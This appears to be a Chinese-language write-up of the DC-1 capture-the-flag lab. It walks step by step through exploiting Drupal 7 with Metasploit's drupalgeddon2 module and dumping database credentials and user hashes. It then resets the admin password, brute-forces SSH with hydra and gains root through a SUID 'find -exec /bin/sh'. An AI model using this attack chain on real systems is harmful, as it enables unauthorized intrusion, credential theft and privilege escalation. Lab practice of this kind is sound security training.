DC1 靶机记录 nmap查看信息 nmap -A ip -sV -vv
1 2 3 4 5 80 http Apache/2.2.22 22 ssh OpenSSH 6.0p1 Debian 4+deb7u7 CMS Drupal 7
使用MSF 搜索 search Drupal 7.x
1 2 3 4 5 6 7 Matching Modules ================ # Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 exploit/unix/webapp/drupal_drupalgeddon2 2018-03-28 excellent Yes Drupal Drupalgeddon 2 Forms API Property Injection
使用payload 0 并且设置目标参数ip use 0
set rhost ip
成功执行payload并且尝试获取shell 1 2 meterpreter > shell Process 3333 created.
为了方便使用python交互shell python -c "import pty;pty.spawn('/bin/bash')"
查看当前权限 1 2 www-data@DC-1:/var/www$ whoami www-data
使用ls查看当前目录信息 1 2 3 4 5 6 www-data@DC-1:/var/www$ ls COPYRIGHT.txt LICENSE.txt cron.php misc sites INSTALL.mysql.txt MAINTAINERS.txt flag1.txt modules themes INSTALL.pgsql.txt README.txt includes profiles update.php INSTALL.sqlite.txt UPGRADE.txt index.php robots.txt web.config INSTALL.txt authorize.php install.php scripts xmlrpc.php
找到flag1并查看 1 2 3 www-data@DC-1:/var/www$ cat flag1.txt Every good CMS needs a config file - and so do you //每个好的CMS都需要一个配置文件——你也是。
根据flag1猜测flag2可能与cms配置文件有关 查找目录发现drupal配置文件发现flag2以及数据库信息 www-data@DC-1:/var/www/sites/default$ cat settings.php
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 <?php $databases = array ( 'default' => array ( 'default' => array ( 'database' => 'drupaldb' , 'username' => 'dbuser' , 'password' => 'R0ck3t' , 'host' => 'localhost' , 'port' => '' , 'driver' => 'mysql' , 'prefix' => '' , ), ), ); ?>
根据flag2提示尝试登录数据库 www-data@DC-1:/var/www$ mysql -u dbuser -pR0ck3t
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 Welcome to the MySQL monitor. Commands end with ; or \g. Your MySQL connection id is 49 Server version: 5.5.60-0+deb7u1 (Debian) Copyright (c) 2000, 2018, Oracle and/or its affiliates. All rights reserved. Oracle is a registered trademark of Oracle Corporation and/or its affiliates. Other names may be trademarks of their respective owners. Type 'help;' or '\h' for help. Type '\c' to clear the current input statement. mysql> show databases; show databases; +--------------------+ | Database | +--------------------+ | information_schema | | drupaldb | +--------------------+ 2 rows in set (0.00 sec) mysql> usr drupaldb use drupaldb Reading table information for completion of table and column names You can turn off this feature to get a quicker startup with -A Database changed mysql> show tables; show tables; +-----------------------------+ | Tables_in_drupaldb | +-----------------------------+ | actions | | authmap | | batch | | block | | block_custom | | block_node_type | | block_role | | blocked_ips | | cache | | cache_block | | cache_bootstrap | | cache_field | | cache_filter | | cache_form | | cache_image | | cache_menu | | cache_page | | cache_path | | cache_update | | cache_views | | cache_views_data | | comment | | ctools_css_cache | | ctools_object_cache | | date_format_locale | | date_format_type | | date_formats | | field_config | | field_config_instance | | field_data_body | | field_data_comment_body | | field_data_field_image | | field_data_field_tags | | field_revision_body | | field_revision_comment_body | | field_revision_field_image | | field_revision_field_tags | | file_managed | | file_usage | | filter | | filter_format | | flood | | history | | image_effects | | image_styles | | menu_custom | | menu_links | | menu_router | | node | | node_access | | node_comment_statistics | | node_revision | | node_type | | queue | | rdf_mapping | | registry | | registry_file | | role | | role_permission | | search_dataset | | search_index | | search_node_links | | search_total | | semaphore | | sequences | | sessions | | shortcut_set | | shortcut_set_users | | system | | taxonomy_index | | taxonomy_term_data | | taxonomy_term_hierarchy | | taxonomy_vocabulary | | url_alias | | users | | users_roles | | variable | | views_display | | views_view | | watchdog | +-----------------------------+ 80 rows in set (0.00 sec)
发现users表查看 1 2 3 4 5 6 7 8 9 10 11 mysql> select * from users; select * from users; +-----+-------+---------------------------------------------------------+-------------------+-------+-----------+------------------+------------+------------+------------+--------+---------------------+----------+---------+-------------------+------+ | uid | name | pass | mail | theme | signature | signature_format | created | access | login | status | timezone | language | picture | init | data | +-----+-------+---------------------------------------------------------+-------------------+-------+-----------+------------------+------------+------------+------------+--------+---------------------+----------+---------+-------------------+------+ | 0 | | | | | | NULL | 0 | 0 | 0 | 0 | NULL | | 0 | | NULL | | 1 | admin | $S$DvQI6Y600iNeXRIeEMF94Y6FvN8nujJcEDTCP9nS5.i38jnEKuDR | admin@example.com | | | NULL | 1550581826 | 1550583852 | 1550582362 | 1 | Australia/Melbourne | | 0 | admin@example.com | b:0; | | 2 | Fred | $S$DWGrxef6.D0cwB5Ts.GlnLw15chRRWH2s1R3QBwC0EkvBQ/9TCGg | fred@example.org | | | filtered_html | 1550581952 | 1550582225 | 1550582225 | 1 | Australia/Melbourne | | 0 | fred@example.org | b:0; | +-----+-------+---------------------------------------------------------+-------------------+-------+-----------+------------------+------------+------------+------------+--------+---------------------+----------+---------+-------------------+------+ 3 rows in set (0.00 sec)
发现密码加盐解不开 经过查看发现可以使用cms自带脚本生成加盐密码 1 2 3 4 www-data@DC-1:/var/www$ php scripts/password-hash.sh admin password: admin hash: $S$DeMqLQwGP7RNQNFSEqHSTU82D/3fanHo3g.MK1a6JMBXjqU.7lyt
将生成加盐密码重新替换为admin 1 2 3 mysql> update users set pass="$S$DeMqLQwGP7RNQNFSEqHSTU82D/3fanHo3g.MK1a6JMBXjqU.7lyt" where uid=1; Query OK, 1 row affected (0.01 sec) Rows matched: 1 Changed: 1 Warnings: 0
使用admin admin 登录网站发现flag3 1 2 Special PERMS will help FIND the passwd - but you'll need to -exec that command to work out how to get what's in the shadow. //特殊的烫发将有助于找到passwd,但您需要执行该命令,以确定如何获取阴影中的内容。
粗略翻译一下下一个flag可能与passwd有关 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 www-data@DC-1:/var/www$ cat /etc/passwd cat /etc/passwd root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/bin/sh man:x:6:12:man:/var/cache/man:/bin/sh lp:x:7:7:lp:/var/spool/lpd:/bin/sh mail:x:8:8:mail:/var/mail:/bin/sh news:x:9:9:news:/var/spool/news:/bin/sh uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh proxy:x:13:13:proxy:/bin:/bin/sh www-data:x:33:33:www-data:/var/www:/bin/sh backup:x:34:34:backup:/var/backups:/bin/sh list:x:38:38:Mailing List Manager:/var/list:/bin/sh irc:x:39:39:ircd:/var/run/ircd:/bin/sh gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh nobody:x:65534:65534:nobody:/nonexistent:/bin/sh libuuid:x:100:101::/var/lib/libuuid:/bin/sh Debian-exim:x:101:104::/var/spool/exim4:/bin/false statd:x:102:65534::/var/lib/nfs:/bin/false messagebus:x:103:107::/var/run/dbus:/bin/false sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin mysql:x:105:109:MySQL Server,,,:/nonexistent:/bin/false flag4:x:1001:1001:Flag4,,,:/home/flag4:/bin/bash
发现flag4用户,尝试爆破 hydra -l flag4 -P /usr/share/john/password.lst ssh://ip
1 [22][ssh] host: 172.16.27.58 login: flag4 password: orange
使用flag4 orange登录 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 $ ssh flag4@172.16.27.58 flag4@172.16.27.58's password: Linux DC-1 3.2.0-6-486 #1 Debian 3.2.102-1 i686 The programs included with the Debian GNU/Linux system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright. Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. flag4@DC-1:~$ ls flag4.txt flag4@DC-1:~$ cat flag4.txt Can you use this same method to find or access the flag in root? Probably. But perhaps it's not that easy. Or maybe it is? //您可以使用同样的方法在根目录中查找flag吗? //可能但也许没那么容易。也许是吧?
根据提示尝试提权 查看root用户拥有的suid文件 find / -user root -perm -4000 -print 2>/dev/null
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 www-data@DC-1:/var/www$ find / -user root -perm -4000 -print 2>/dev/null /bin/mount /bin/ping /bin/su /bin/ping6 /bin/umount /usr/bin/chsh /usr/bin/passwd /usr/bin/newgrp /usr/bin/chfn /usr/bin/gpasswd /usr/bin/procmail /usr/bin/find /usr/sbin/exim4 /usr/lib/pt_chown /usr/lib/openssh/ssh-keysign /usr/lib/eject/dmcrypt-get-device /usr/lib/dbus-1.0/dbus-daemon-launch-helper /sbin/mount.nfs
发现find命令有提权方式 www-data@DC-1:/tmp$ find -exec /bin/sh \;
提权成功查看/root目录下文件 1 2 3 4 5 6 7 8 9 10 11 12 13 # cd /root # ls thefinalflag.txt # cat thefinalflag.txt Well done!!!! Hopefully you've enjoyed this and learned some new skills. You can let me know what you thought of this little journey by contacting me via Twitter - @DCAU7 // 做得好!!!! 希望你喜欢这个,并学到了一些新技能。 你可以告诉我你对这次小旅行的看法 通过Twitter联系我-@DCAU7
